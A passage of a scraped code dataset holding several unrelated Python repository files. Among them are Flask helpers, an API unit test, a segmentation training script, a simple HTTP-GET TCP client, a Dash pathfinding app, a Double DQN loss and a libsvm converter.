address)\n","repo_name":"skybrush-io/ap-swarm-launcher","sub_path":"src/ap_swarm_launcher/udp_serial_bridge.py","file_name":"udp_serial_bridge.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"20688565414","text":"from flask import g, request\nfrom morio.model import User, Repository, Course\nfrom morio.core.error import NotFoundError, SignatureError\nfrom morio.core.error import JsonException\n\n\ndef retrieve_payload(schema):\n from voluptuous import Schema\n from voluptuous import REMOVE_EXTRA\n from voluptuous import MultipleInvalid\n\n payload = request.get_json()\n if not payload:\n raise JsonException(desc='Payload missing')\n schema = Schema(schema, extra=REMOVE_EXTRA)\n try:\n payload = schema(payload)\n except MultipleInvalid as e:\n raise JsonException(desc=e.msg)\n return payload\n\n\ndef if_email(email):\n import re\n return re.compile('[^@]+@[^@]+\\.[^@]+').match(email)\n\n\ndef retrieve_user_repo(username, repo_name):\n user = User.query.filter_by(name=username).first()\n if not user:\n raise NotFoundError(desc='User not found')\n repo = Repository.query.filter_by(user_id=user.id, name=repo_name).first()\n if not repo or (\n repo.private and (not g.user or g.user.id != repo.user_id)\n ):\n raise NotFoundError(desc='Repo not found')\n return user, repo\n\n\ndef retrieve_course(course_id):\n course = Course.query.get(course_id)\n if not course:\n raise NotFoundError\n if course.user_id != g.user.id:\n raise SignatureError(description='Permission denied')\n return course\n","repo_name":"wddwycc/morio","sub_path":"morio/routes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20536556211","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_config import cfg\n\nfrom manuka.extensions import db\nfrom manuka import models\nfrom manuka.tests.unit import base\n\n\nCONF = cfg.CONF\n\n\nclass TestExternalIdApi(base.ApiTestCase):\n\n def setUp(self):\n super().setUp()\n user, external_id = self.make_db_user(state='created',\n email='test@example.com')\n self.user = user\n self.external_id = external_id\n\n def test_external_id_get(self):\n response = self.client.get('/api/v1/external-ids/%s/' %\n self.external_id.id)\n\n self.assert200(response)\n self.assertExternalIdEqual(self.external_id, response.get_json())\n\n def test_external_id_update(self):\n new_user, new_external_id = self.make_db_user(\n id=345, state='created', email='test2@example.com')\n\n self.assertEqual(1, len(new_user.external_ids))\n self.assertEqual(1, len(self.user.external_ids))\n data = {'user_id': new_user.keystone_user_id}\n response = self.client.patch('/api/v1/external-ids/%s/' %\n self.external_id.id,\n json=data)\n\n self.assert200(response)\n new_user = db.session.query(models.User).get(new_user.id)\n self.assertEqual(2, len(new_user.external_ids))\n old_user = db.session.query(models.User).get(self.user.id)\n self.assertEqual(0, len(old_user.external_ids))\n\n external_id = db.session.query(models.ExternalId).get(\n self.external_id.id)\n\n self.assertExternalIdEqual(external_id, response.get_json())\n\n def test_external_id_delete(self):\n response = self.client.delete('/api/v1/external-ids/%s/' %\n self.external_id.id)\n self.assertStatus(response, 204)\n","repo_name":"NeCTAR-RC/manuka","sub_path":"manuka/tests/unit/api/v1/test_external_id.py","file_name":"test_external_id.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14680832309","text":"\"\"\"\ntraining code\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nimport argparse\nimport logging\nimport os\nimport torch\n\nfrom config import cfg, assert_and_infer_cfg\nfrom utils.misc import AverageMeter, prep_experiment, evaluate_eval, fast_hist\nimport datasets\nimport loss\nimport network\nimport optimizer\nimport time\nimport torchvision.utils as vutils\nimport torch.nn.functional as F\nfrom network.mynn import freeze_weights, unfreeze_weights\nimport numpy as np\nimport random\n\n# Argument Parser\nparser = argparse.ArgumentParser(description='Semantic Segmentation')\nparser.add_argument('--lr', type=float, default=0.01)\nparser.add_argument('--arch', type=str, default='network.deepv3.DeepWV3Plus',\n help='Network architecture. We have DeepSRNX50V3PlusD (backbone: ResNeXt50) \\\n and deepWV3Plus (backbone: WideResNet38).')\nparser.add_argument('--dataset', nargs='*', type=str, default=['cityscapes'],\n help='a list of datasets; cityscapes, mapillary, camvid, kitti, gtav, mapillary, synthia')\nparser.add_argument('--image_uniform_sampling', action='store_true', default=False,\n help='uniformly sample images across the multiple source domains')\nparser.add_argument('--val_dataset', nargs='*', type=str, default=['bdd100k'],\n help='a list consists of cityscapes, mapillary, gtav, bdd100k, synthia')\nparser.add_argument('--covstat_val_dataset', nargs='*', type=str, default=['cityscapes'],\n help='a list consists of cityscapes, mapillary, gtav, bdd100k, synthia')\nparser.add_argument('--cv', type=int, default=0,\n help='cross-validation split id to use. Default # of splits set to 3 in config')\nparser.add_argument('--class_uniform_pct', type=float, default=0,\n help='What fraction of images is uniformly sampled')\nparser.add_argument('--class_uniform_tile', type=int, default=1024,\n help='tile size for class uniform sampling')\nparser.add_argument('--coarse_boost_classes', type=str, default=None,\n help='use coarse annotations to boost fine data with specific classes')\n\nparser.add_argument('--img_wt_loss', action='store_true', default=False,\n help='per-image class-weighted loss')\nparser.add_argument('--cls_wt_loss', action='store_true', default=False,\n help='class-weighted loss')\nparser.add_argument('--batch_weighting', action='store_true', default=False,\n help='Batch weighting for class (use nll class weighting using batch stats')\n\nparser.add_argument('--jointwtborder', action='store_true', default=False,\n help='Enable boundary label relaxation')\nparser.add_argument('--strict_bdr_cls', type=str, default='',\n help='Enable boundary label relaxation for specific classes')\nparser.add_argument('--rlx_off_iter', type=int, default=-1,\n help='Turn off border relaxation after specific epoch count')\nparser.add_argument('--rescale', type=float, default=1.0,\n help='Warm Restarts new learning rate ratio compared to original lr')\nparser.add_argument('--repoly', type=float, default=1.5,\n help='Warm Restart new poly exp')\n\nparser.add_argument('--fp16', action='store_true', default=False,\n help='Use Nvidia Apex AMP')\nparser.add_argument('--local_rank', default=0, type=int,\n help='parameter used by apex library')\n\nparser.add_argument('--sgd', action='store_true', default=True)\nparser.add_argument('--adam', action='store_true', default=False)\nparser.add_argument('--amsgrad', action='store_true', default=False)\n\nparser.add_argument('--freeze_trunk', action='store_true', default=False)\nparser.add_argument('--hardnm', default=0, type=int,\n help='0 means no aug, 1 means hard negative mining iter 1,' +\n '2 means hard negative mining iter 2')\n\nparser.add_argument('--trunk', type=str, default='resnet101',\n help='trunk model, can be: resnet101 (default), resnet50')\nparser.add_argument('--max_epoch', type=int, default=180)\nparser.add_argument('--max_iter', type=int, default=30000)\nparser.add_argument('--max_cu_epoch', type=int, default=100000,\n help='Class Uniform Max Epochs')\nparser.add_argument('--start_epoch', type=int, default=0)\nparser.add_argument('--crop_nopad', action='store_true', default=False)\nparser.add_argument('--rrotate', type=int,\n default=0, help='degree of random roate')\nparser.add_argument('--color_aug', type=float,\n default=0.0, help='level of color augmentation')\nparser.add_argument('--gblur', action='store_true', default=False,\n help='Use Guassian Blur Augmentation')\nparser.add_argument('--bblur', action='store_true', default=False,\n help='Use Bilateral Blur Augmentation')\nparser.add_argument('--lr_schedule', type=str, default='poly',\n help='name of lr schedule: poly')\nparser.add_argument('--poly_exp', type=float, default=0.9,\n help='polynomial LR exponent')\nparser.add_argument('--bs_mult', type=int, default=2,\n help='Batch size for training per gpu')\nparser.add_argument('--bs_mult_val', type=int, default=1,\n help='Batch size for Validation per gpu')\nparser.add_argument('--crop_size', type=int, default=720,\n help='training crop size')\nparser.add_argument('--pre_size', type=int, default=None,\n help='resize image shorter edge to this before augmentation')\nparser.add_argument('--scale_min', type=float, default=0.5,\n help='dynamically scale training images down to this size')\nparser.add_argument('--scale_max', type=float, default=2.0,\n help='dynamically scale training images up to this size')\nparser.add_argument('--weight_decay', type=float, default=5e-4)\nparser.add_argument('--momentum', type=float, default=0.9)\nparser.add_argument('--snapshot', type=str, default=None)\nparser.add_argument('--restore_optimizer', action='store_true', default=False)\n\nparser.add_argument('--city_mode', type=str, default='train',\n help='experiment directory date name')\nparser.add_argument('--date', type=str, default='default',\n help='experiment directory date name')\nparser.add_argument('--exp', type=str, default='default',\n help='experiment directory name')\nparser.add_argument('--tb_tag', type=str, default='',\n help='add tag to tb dir')\nparser.add_argument('--ckpt', type=str, default='logs/ckpt',\n help='Save Checkpoint Point')\nparser.add_argument('--tb_path', type=str, default='logs/tb',\n help='Save Tensorboard Path')\nparser.add_argument('--syncbn', action='store_true', default=True,\n help='Use Synchronized BN')\nparser.add_argument('--dump_augmentation_images', action='store_true', default=False,\n help='Dump Augmentated Images for sanity check')\nparser.add_argument('--test_mode', action='store_true', default=False,\n help='Minimum testing to verify nothing failed, ' +\n 'Runs code for 1 epoch of train and val')\nparser.add_argument('-wb', '--wt_bound', type=float, default=1.0,\n help='Weight Scaling for the losses')\nparser.add_argument('--maxSkip', type=int, default=0,\n help='Skip x number of frames of video augmented dataset')\nparser.add_argument('--scf', action='store_true', default=False,\n help='scale correction factor')\nparser.add_argument('--dist_url', default='tcp://127.0.0.1:', type=str,\n help='url used to set up distributed training')\n\nparser.add_argument('--wt_layer', nargs='*', type=int, default=[0,0,0,0,0,0,0],\n help='0: None, 1: IW/IRW, 2: ISW, 3: IS, 4: IN (IBNNet: 0 0 4 4 4 0 0)')\nparser.add_argument('--wt_reg_weight', type=float, default=0.0)\nparser.add_argument('--relax_denom', type=float, default=2.0)\nparser.add_argument('--clusters', type=int, default=50)\nparser.add_argument('--trials', type=int, default=10)\nparser.add_argument('--dynamic', action='store_true', default=False)\n\nparser.add_argument('--image_in', action='store_true', default=False,\n help='Input Image Instance Norm')\nparser.add_argument('--cov_stat_epoch', type=int, default=5,\n help='cov_stat_epoch')\nparser.add_argument('--visualize_feature', action='store_true', default=False,\n help='Visualize intermediate feature')\nparser.add_argument('--use_wtloss', action='store_true', default=False,\n help='Automatic setting from wt_layer')\nparser.add_argument('--use_isw', action='store_true', default=False,\n help='Automatic setting from wt_layer')\n\nargs = parser.parse_args()\n\n# Enable CUDNN Benchmarking optimization\n#torch.backends.cudnn.benchmark = True\nrandom_seed = cfg.RANDOM_SEED #304\ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed(random_seed)\ntorch.cuda.manual_seed_all(random_seed) # if use multi-GPU\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(random_seed)\nrandom.seed(random_seed)\n\nargs.world_size = 1\n\n# Test Mode run two epochs with a few iterations of training and val\nif args.test_mode:\n args.max_epoch = 2\n\nif 'WORLD_SIZE' in os.environ:\n # args.apex = int(os.environ['WORLD_SIZE']) > 1\n args.world_size = int(os.environ['WORLD_SIZE'])\n print(\"Total world size: \", int(os.environ['WORLD_SIZE']))\n\ntorch.cuda.set_device(args.local_rank)\nprint('My Rank:', args.local_rank)\n# Initialize distributed communication\nargs.dist_url = args.dist_url + str(8000 + (int(time.time()%1000))//10)\n\ntorch.distributed.init_process_group(backend='nccl',\n init_method=args.dist_url,\n world_size=args.world_size,\n rank=args.local_rank)\n\nfor i in range(len(args.wt_layer)):\n if args.wt_layer[i] == 1:\n args.use_wtloss = True\n if args.wt_layer[i] == 2:\n args.use_wtloss = True\n args.use_isw = True\n\ndef main():\n \"\"\"\n Main Function\n \"\"\"\n # Set up the Arguments, Tensorboard Writer, Dataloader, Loss Fn, Optimizer\n assert_and_infer_cfg(args)\n writer = prep_experiment(args, parser)\n\n train_loader, val_loaders, train_obj, extra_val_loaders, covstat_val_loaders = datasets.setup_loaders(args)\n\n criterion, criterion_val = loss.get_loss(args)\n criterion_aux = loss.get_loss_aux(args)\n net = network.get_net(args, criterion, criterion_aux)\n\n optim, scheduler = optimizer.get_optimizer(args, net)\n\n net = torch.nn.SyncBatchNorm.convert_sync_batchnorm(net)\n net = network.warp_network_in_dataparallel(net, args.local_rank)\n epoch = 0\n i = 0\n\n if args.snapshot:\n epoch, mean_iu = optimizer.load_weights(net, optim, scheduler,\n args.snapshot, args.restore_optimizer)\n if args.restore_optimizer is True:\n iter_per_epoch = len(train_loader)\n i = iter_per_epoch * epoch\n else:\n epoch = 0\n\n print(\"#### iteration\", i)\n torch.cuda.empty_cache()\n # Main Loop\n # for epoch in range(args.start_epoch, args.max_epoch):\n\n while i < args.max_iter:\n # Update EPOCH CTR\n cfg.immutable(False)\n cfg.ITER = i\n cfg.immutable(True)\n\n i = train(train_loader, net, optim, epoch, writer, scheduler, args.max_iter)\n train_loader.sampler.set_epoch(epoch + 1)\n\n if (args.dynamic and args.use_isw and epoch % (args.cov_stat_epoch + 1) == args.cov_stat_epoch) \\\n or (args.dynamic is False and args.use_isw and epoch == args.cov_stat_epoch):\n net.module.reset_mask_matrix()\n for trial in range(args.trials):\n for dataset, val_loader in covstat_val_loaders.items(): # For get the statistics of covariance\n validate_for_cov_stat(val_loader, dataset, net, criterion_val, optim, scheduler, epoch, writer, i,\n save_pth=False)\n net.module.set_mask_matrix()\n\n if args.local_rank == 0:\n print(\"Saving pth file...\")\n evaluate_eval(args, net, optim, scheduler, None, None, [],\n writer, epoch, \"None\", None, i, save_pth=True)\n\n if args.class_uniform_pct:\n if epoch >= args.max_cu_epoch:\n train_obj.build_epoch(cut=True)\n train_loader.sampler.set_num_samples()\n else:\n train_obj.build_epoch()\n\n epoch += 1\n\n # Validation after epochs\n if len(val_loaders) == 1:\n # Run validation only one time - To save models\n for dataset, val_loader in val_loaders.items():\n validate(val_loader, dataset, net, criterion_val, optim, scheduler, epoch, writer, i)\n else:\n if args.local_rank == 0:\n print(\"Saving pth file...\")\n evaluate_eval(args, net, optim, scheduler, None, None, [],\n writer, epoch, \"None\", None, i, save_pth=True)\n\n for dataset, val_loader in extra_val_loaders.items():\n print(\"Extra validating... This won't save pth file\")\n validate(val_loader, dataset, net, criterion_val, optim, scheduler, epoch, writer, i, save_pth=False)\n\n\ndef train(train_loader, net, optim, curr_epoch, writer, scheduler, max_iter):\n \"\"\"\n Runs the training loop per epoch\n train_loader: Data loader for train\n net: thet network\n optimizer: optimizer\n curr_epoch: current epoch\n writer: tensorboard writer\n return:\n \"\"\"\n net.train()\n\n train_total_loss = AverageMeter()\n time_meter = AverageMeter()\n\n curr_iter = curr_epoch * len(train_loader)\n\n for i, data in enumerate(train_loader):\n if curr_iter >= max_iter:\n break\n\n inputs, gts, _, aux_gts = data\n\n # Multi source and AGG case\n if len(inputs.shape) == 5:\n B, D, C, H, W = inputs.shape\n num_domains = D\n inputs = inputs.transpose(0, 1)\n gts = gts.transpose(0, 1).squeeze(2)\n aux_gts = aux_gts.transpose(0, 1).squeeze(2)\n\n inputs = [input.squeeze(0) for input in torch.chunk(inputs, num_domains, 0)]\n gts = [gt.squeeze(0) for gt in torch.chunk(gts, num_domains, 0)]\n aux_gts = [aux_gt.squeeze(0) for aux_gt in torch.chunk(aux_gts, num_domains, 0)]\n else:\n B, C, H, W = inputs.shape\n num_domains = 1\n inputs = [inputs]\n gts = [gts]\n aux_gts = [aux_gts]\n\n batch_pixel_size = C * H * W\n\n for di, ingredients in enumerate(zip(inputs, gts, aux_gts)):\n input, gt, aux_gt = ingredients\n\n start_ts = time.time()\n\n img_gt = None\n input, gt = input.cuda(), gt.cuda()\n\n optim.zero_grad()\n if args.use_isw:\n outputs = net(input, gts=gt, aux_gts=aux_gt, img_gt=img_gt, visualize=args.visualize_feature,\n apply_wtloss=False if curr_epoch<=args.cov_stat_epoch else True)\n else:\n outputs = net(input, gts=gt, aux_gts=aux_gt, img_gt=img_gt, visualize=args.visualize_feature)\n outputs_index = 0\n main_loss = outputs[outputs_index]\n outputs_index += 1\n aux_loss = outputs[outputs_index]\n outputs_index += 1\n total_loss = main_loss + (0.4 * aux_loss)\n\n if args.use_wtloss and (not args.use_isw or (args.use_isw and curr_epoch > args.cov_stat_epoch)):\n wt_loss = outputs[outputs_index]\n outputs_index += 1\n total_loss = total_loss + (args.wt_reg_weight * wt_loss)\n else:\n wt_loss = 0\n\n if args.visualize_feature:\n f_cor_arr = outputs[outputs_index]\n outputs_index += 1\n\n log_total_loss = total_loss.clone().detach_()\n torch.distributed.all_reduce(log_total_loss, torch.distributed.ReduceOp.SUM)\n log_total_loss = log_total_loss / args.world_size\n train_total_loss.update(log_total_loss.item(), batch_pixel_size)\n\n total_loss.backward()\n optim.step()\n\n time_meter.update(time.time() - start_ts)\n\n del total_loss, log_total_loss\n\n if args.local_rank == 0:\n if i % 50 == 49:\n if args.visualize_feature:\n visualize_matrix(writer, f_cor_arr, curr_iter, '/Covariance/Feature-')\n\n msg = '[epoch {}], [iter {} / {} : {}], [loss {:0.6f}], [lr {:0.6f}], [time {:0.4f}]'.format(\n curr_epoch, i + 1, len(train_loader), curr_iter, train_total_loss.avg,\n optim.param_groups[-1]['lr'], time_meter.avg / args.train_batch_size)\n\n logging.info(msg)\n if args.use_wtloss:\n print(\"Whitening Loss\", wt_loss)\n\n # Log tensorboard metrics for each iteration of the training phase\n writer.add_scalar('loss/train_loss', (train_total_loss.avg),\n curr_iter)\n train_total_loss.reset()\n time_meter.reset()\n\n curr_iter += 1\n scheduler.step()\n\n if i > 5 and args.test_mode:\n return curr_iter\n\n return curr_iter\n\ndef validate(val_loader, dataset, net, criterion, optim, scheduler, curr_epoch, writer, curr_iter, save_pth=True):\n \"\"\"\n Runs the validation loop after each training epoch\n val_loader: Data loader for validation\n dataset: dataset name (str)\n net: thet network\n criterion: loss fn\n optimizer: optimizer\n curr_epoch: current epoch\n writer: tensorboard writer\n return: val_avg for step function if required\n \"\"\"\n\n net.eval()\n val_loss = AverageMeter()\n iou_acc = 0\n error_acc = 0\n dump_images = []\n\n for val_idx, data in enumerate(val_loader):\n # input = torch.Size([1, 3, 713, 713])\n # gt_image = torch.Size([1, 713, 713])\n inputs, gt_image, img_names, _ = data\n\n if len(inputs.shape) == 5:\n B, D, C, H, W = inputs.shape\n inputs = inputs.view(-1, C, H, W)\n gt_image = gt_image.view(-1, 1, H, W)\n\n assert len(inputs.size()) == 4 and len(gt_image.size()) == 3\n assert inputs.size()[2:] == gt_image.size()[1:]\n\n batch_pixel_size = inputs.size(0) * inputs.size(2) * inputs.size(3)\n inputs, gt_cuda = inputs.cuda(), gt_image.cuda()\n\n with torch.no_grad():\n if args.use_wtloss:\n output, f_cor_arr = net(inputs, visualize=True)\n else:\n output = net(inputs)\n\n del inputs\n\n assert output.size()[2:] == gt_image.size()[1:]\n assert output.size()[1] == datasets.num_classes\n\n val_loss.update(criterion(output, gt_cuda).item(), batch_pixel_size)\n\n del gt_cuda\n\n # Collect data from different GPU to a single GPU since\n # encoding.parallel.criterionparallel function calculates distributed loss\n # functions\n predictions = output.data.max(1)[1].cpu()\n\n # Logging\n if val_idx % 20 == 0:\n if args.local_rank == 0:\n logging.info(\"validating: %d / %d\", val_idx + 1, len(val_loader))\n if val_idx > 10 and args.test_mode:\n break\n\n # Image Dumps\n if val_idx < 10:\n dump_images.append([gt_image, predictions, img_names])\n\n iou_acc += fast_hist(predictions.numpy().flatten(), gt_image.numpy().flatten(),\n datasets.num_classes)\n del output, val_idx, data\n\n iou_acc_tensor = torch.cuda.FloatTensor(iou_acc)\n torch.distributed.all_reduce(iou_acc_tensor, op=torch.distributed.ReduceOp.SUM)\n iou_acc = iou_acc_tensor.cpu().numpy()\n\n if args.local_rank == 0:\n evaluate_eval(args, net, optim, scheduler, val_loss, iou_acc, dump_images,\n writer, curr_epoch, dataset, None, curr_iter, save_pth=save_pth)\n\n if args.use_wtloss:\n visualize_matrix(writer, f_cor_arr, curr_iter, '/Covariance/Feature-')\n\n return val_loss.avg\n\ndef validate_for_cov_stat(val_loader, dataset, net, criterion, optim, scheduler, curr_epoch, writer, curr_iter, save_pth=True):\n \"\"\"\n Runs the validation loop after each training epoch\n val_loader: Data loader for validation\n dataset: dataset name (str)\n net: thet network\n criterion: loss fn\n optimizer: optimizer\n curr_epoch: current epoch\n writer: tensorboard writer\n return: val_avg for step function if required\n \"\"\"\n\n # net.train()#eval()\n net.eval()\n\n for val_idx, data in enumerate(val_loader):\n img_or, img_photometric, img_geometric, img_name = data # img_geometric is not used.\n img_or, img_photometric = img_or.cuda(), img_photometric.cuda()\n\n with torch.no_grad():\n net([img_photometric, img_or], cal_covstat=True)\n\n del img_or, img_photometric, img_geometric\n\n # Logging\n if val_idx % 20 == 0:\n if args.local_rank == 0:\n logging.info(\"validating: %d / 100\", val_idx + 1)\n del data\n\n if val_idx >= 499:\n return\n\n\ndef visualize_matrix(writer, matrix_arr, iteration, title_str):\n stage = 'valid'\n\n for i in range(len(matrix_arr)):\n C = matrix_arr[i].shape[1]\n matrix = matrix_arr[i][0].unsqueeze(0) # 1 X C X C\n matrix = torch.clamp(torch.abs(matrix), max=1)\n matrix = torch.cat((torch.ones(1, C, C).cuda(), torch.abs(matrix - 1.0),\n torch.abs(matrix - 1.0)), 0)\n matrix = vutils.make_grid(matrix, padding=5, normalize=False, range=(0,1))\n writer.add_image(stage + title_str + str(i), matrix, iteration)\n\n\ndef save_feature_numpy(feature_maps, iteration):\n file_fullpath = '/home/userA/projects/visualization/feature_map/'\n file_name = str(args.date) + '_' + str(args.exp)\n B, C, H, W = feature_maps.shape\n for i in range(B):\n feature_map = feature_maps[i]\n feature_map = feature_map.data.cpu().numpy() # H X D\n file_name_post = '_' + str(iteration * B + i)\n np.save(file_fullpath + file_name + file_name_post, feature_map)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shachoi/RobustNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":22722,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"52"} +{"seq_id":"27997499679","text":"import socket\nfrom termcolor import colored,cprint\n\nwelcome_msg = colored('Welcome to my first Black Hat Python Project','red',attrs=['reverse','blink'])\nprint(welcome_msg)\nprint('Format {hostname}:{port}')\ntarget = input('Enter the target: ').split(':')\ntarget_host = target[0]\ntarget_port = int(target[1])\n\n#create socket object\nclient = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n#connect to client\nclient.connect((target_host,target_port))\n\nrequest = 'GET / HTTP/1.1\\nHost: {}\\n\\n'.format(target_host).encode('utf-8')\n#send some data\nclient.send(request)\n\n#recieve some data\nresponse = client.recv(1024)\n\ncprint(response,'green')\n\n\n\n\n\n","repo_name":"ab41j1t4000/hacking_scripts","sub_path":"Black-Hat-Python-Projects/tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11380519642","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport dash\r\nimport json\r\nimport layout as lo\r\nimport utils\r\nimport styles as st\r\nfrom dash.dependencies import Input\r\nfrom dash.dependencies import Output\r\nfrom dash.dependencies import State\r\n\r\n# import pandas as pd\r\n# from datetime import datetime\r\n# import A_star\r\n# import pickle\r\n# import the css template, and pass the css template into dash\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\napp.title = \"Boston Pathfinding Visualization\"\r\napp.layout = lo.layout\r\nstyles = st.styles\r\n\r\n\r\n# ##################################callback for left side components\r\n# @app.callback(\r\n# dash.dependencies.Output('my-graph', 'figure'),\r\n# [dash.dependencies.Input('my-range-slider', 'value'), dash.dependencies.Input('input1', 'value')])\r\n# def update_output(value, input1):\r\n# YEAR = value\r\n# ACCOUNT = input1\r\n# return draw_graph(value, input1)\r\n# # to update the global variable of YEAR and ACCOUNT\r\n#\r\n\r\n\r\n@app.callback(\r\n Output('my-graph', 'figure'),\r\n Output('confirm', 'displayed'),\r\n Input('play-val', 'n_clicks'),\r\n Input('show-dest', 'children'),\r\n Input('reset', 'n_clicks'),\r\n Input('my-graph', 'clickData'),\r\n State('add-block', 'style'))\r\ndef update_output(n_clicks, new_dest, reset, clickData, style):\r\n ctx = dash.callback_context\r\n if not ctx.triggered:\r\n button_id = 'No clicks yet'\r\n else:\r\n button_id = ctx.triggered[0]['prop_id']\r\n if button_id == 'my-graph.clickData' and style == styles['add-block-enable']:\r\n # add block\r\n return utils.add_block(clickData), False\r\n elif button_id == 'play-val.n_clicks' or button_id == 'reset.n_clicks' or button_id == 'show-dest.children':\r\n # next tic\r\n return utils.next_tic(n_clicks, reset), utils.global_restart_flag\r\n\r\n else:\r\n # no update\r\n return dash.no_update, False\r\n\r\n\r\n\r\n# ###############################callback for right side components\r\n# @app.callback(\r\n# Output('hover-data', 'children'),\r\n# Input('my-graph', 'hoverData'))\r\n# def display_hover_data(hoverData):\r\n# return json.dumps(hoverData, indent=2)\r\n#\r\n\r\n@app.callback(\r\n Output('click-data', 'children'),\r\n Input('my-graph', 'clickData'))\r\ndef display_click_data(clickData):\r\n return json.dumps(clickData, indent=2)\r\n\r\n\r\n@app.callback(\r\n Output('show-dest', 'children'),\r\n Input('set-dest', 'n_clicks'),\r\n State('click-data', 'children'))\r\ndef set_destination(n_clicks, new_dest):\r\n return utils.update_destination(new_dest)\r\n\r\n\r\n@app.callback(\r\n Output('add-block', 'style'),\r\n Input('add-block', 'n_clicks'))\r\ndef enable_add_block(n_clicks):\r\n return styles[utils.enable_add_block(n_clicks)]\r\n\r\n\r\n@app.callback(\r\n Output('show-algorithm', 'children'),\r\n Input('switch-algorithm', 'n_clicks'),\r\n Input('step-slider', 'value'))\r\ndef game_settings(n_clicks, value):\r\n ctx = dash.callback_context\r\n if not ctx.triggered:\r\n button_id = 'switch-algorithm.n_clicks'\r\n else:\r\n button_id = ctx.triggered[0]['prop_id']\r\n\r\n if button_id == 'switch-algorithm.n_clicks':\r\n return utils.switch_algorithm()\r\n elif button_id == 'step-slider.value':\r\n return utils.change_npc_step(value)\r\n else:\r\n return dash.no_update\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","repo_name":"route-recommendation-web/BOS-VIZ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18828236651","text":"import gym\nfrom utils.preprocess import greyscale\nfrom utils.wrappers import PreproWrapper, MaxAndSkipEnv\n\nimport tensorflow as tf\n\nfrom q2_schedule import LinearExploration, LinearSchedule\nfrom q4_nature_torch import NatureQN\nfrom configs.q6_train_atari_doubledqn import config\n\n\nclass DoubleDQN(NatureQN):\n \"\"\"\n Implementation for Double DQN\n \"\"\"\n def add_loss_op(self, q, target_q):\n num_actions = self.env.action_space.n\n y_val = self.r + self.config.gamma * tf.reduce_sum(tf.multiply(target_q, tf.one_hot(tf.arg_max(q, dimension=1), num_actions)), axis=1)\n q_sample = tf.where(self.done_mask, self.r, y_val)\n q_new = tf.reduce_sum(tf.multiply(tf.one_hot(self.a, num_actions), q), axis=1)\n self.loss = tf.reduce_mean(tf.square(q_new - q_sample))\n\n\nif __name__ == '__main__':\n # make env\n env = gym.make(config.env_name)\n env = MaxAndSkipEnv(env, skip=config.skip_frame)\n env = PreproWrapper(env, prepro=greyscale, shape=(80, 80, 1),\n overwrite_render=config.overwrite_render)\n\n # exploration strategy\n exp_schedule = LinearExploration(env, config.eps_begin,\n config.eps_end, config.eps_nsteps)\n\n # learning rate schedule\n lr_schedule = LinearSchedule(config.lr_begin, config.lr_end,\n config.lr_nsteps)\n\n # train model\n model = DoubleDQN(env, config)\n model.run(exp_schedule, lr_schedule)","repo_name":"tejas1794/RL-Project","sub_path":"src/q6_train_atari_doubledqn.py","file_name":"q6_train_atari_doubledqn.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36852474051","text":"#!/usr/bin/env python\n\n# convert libsvm file compressing indices\n\n# python svm2svm.py file.libsvm > newfile.libsvm\nfrom __future__ import print_function\nimport string, os, sys\n\n\ndef svm2svm(lines):\n gf = 1\n remap = {}\n for line in lines:\n data_comment = line.strip().split('#')\n items = data_comment[0].split()\n print('%s' % items[0], end='')\n phi = []\n for pair in range(1,len(items)):\n (feature,val) = items[pair].split(':')\n if feature not in remap:\n gf = gf + 1\n remap[feature] = gf\n phi.append((remap[feature],float(val)))\n phi.sort()\n for p in phi:\n print(' %d:%f' % (p[0],p[1]), end='')\n print(' # %s' % data_comment[1])\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: %s file.libsvm' % sys.argv[0])\n else:\n lines = open(sys.argv[1]).readlines()\n svm2svm(lines)\n","repo_name":"lambday/KLog","sub_path":"src/py/svm2svm.py","file_name":"svm2svm.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3257836164","text":"import parse\r\nfrom collections import defaultdict\r\n\r\nSQUARE_SIZE = 1000\r\n\r\nclass Claim(object):\r\n _format = parse.compile(\"#{id} @ {x},{y}: {w}x{h}\")\r\n def __init__(self, claim_str):\r\n r = Claim._format.parse(claim_str)\r\n self.id = int(r[\"id\"])\r\n self.x = int(r[\"x\"])\r\n self.y = int(r[\"y\"])\r\n self.w = int(r[\"w\"])\r\n self.h = int(r[\"h\"])\r\n self.str = claim_str\r\n\r\n def to_1d_space(self):\r\n linear_space = defaultdict(int)\r\n for i in range(self.x, self.x + self.w):\r\n for j in 